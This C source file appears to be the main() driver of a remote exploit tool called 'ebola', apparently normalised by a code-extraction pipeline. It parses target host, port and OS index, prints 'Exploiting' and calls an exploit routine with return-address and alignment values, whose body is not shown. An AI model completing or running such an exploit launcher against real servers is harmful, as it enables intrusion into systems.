
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {char* os; int align; int ret; } ;


 int EBOLA ;
 int EOF ;
 int MAX_TG ;
 int atoi (char*) ;
 int banner () ;
 int debug ;
 int ebol4 (char*,int,int ,int ) ;
 TYPE_1__* ebola ;
 int fprintf (int ,char*,char*,int,char*) ;
 int getopt (int,char**,char*) ;
 int list () ;
 char* optarg ;
 int stdout ;
 int usage (char*) ;
 int warning (char*) ;

int main (int argc, char **argv)
{
 int c, i = -1, port = EBOLA;
 char *target =((void*)0);

 while ((c = getopt(argc, argv, "hVlt:d:p:")) != EOF)
 {
  switch (c)
  {
   case 'p' : port = atoi(optarg); break;
   case 'd' : target = optarg; break;

   case 't' :
       i = atoi(optarg);
       if (i<0 || i>MAX_TG-1)
        usage(argv[0]);
       break;

   case 'l' : list(); break;
   case 'V' : debug = 0x1; break;

   case 'h' :
   default : usage(argv[0]);
  }
 }

 if (target == ((void*)0) || i == -1)
  usage(argv[0]);

 banner();

 fprintf (stdout, " _(0x0)_  Exploiting <%s:%d> on %s\n", target, port, ebola[i].os);

 if ((ebol4(target, port, ebola[i].ret, ebola[i].align)) == 0x333)
  return 0;
 else
  warning ("\n _(0x666)_  Exploitation Failed !\n\n");
}
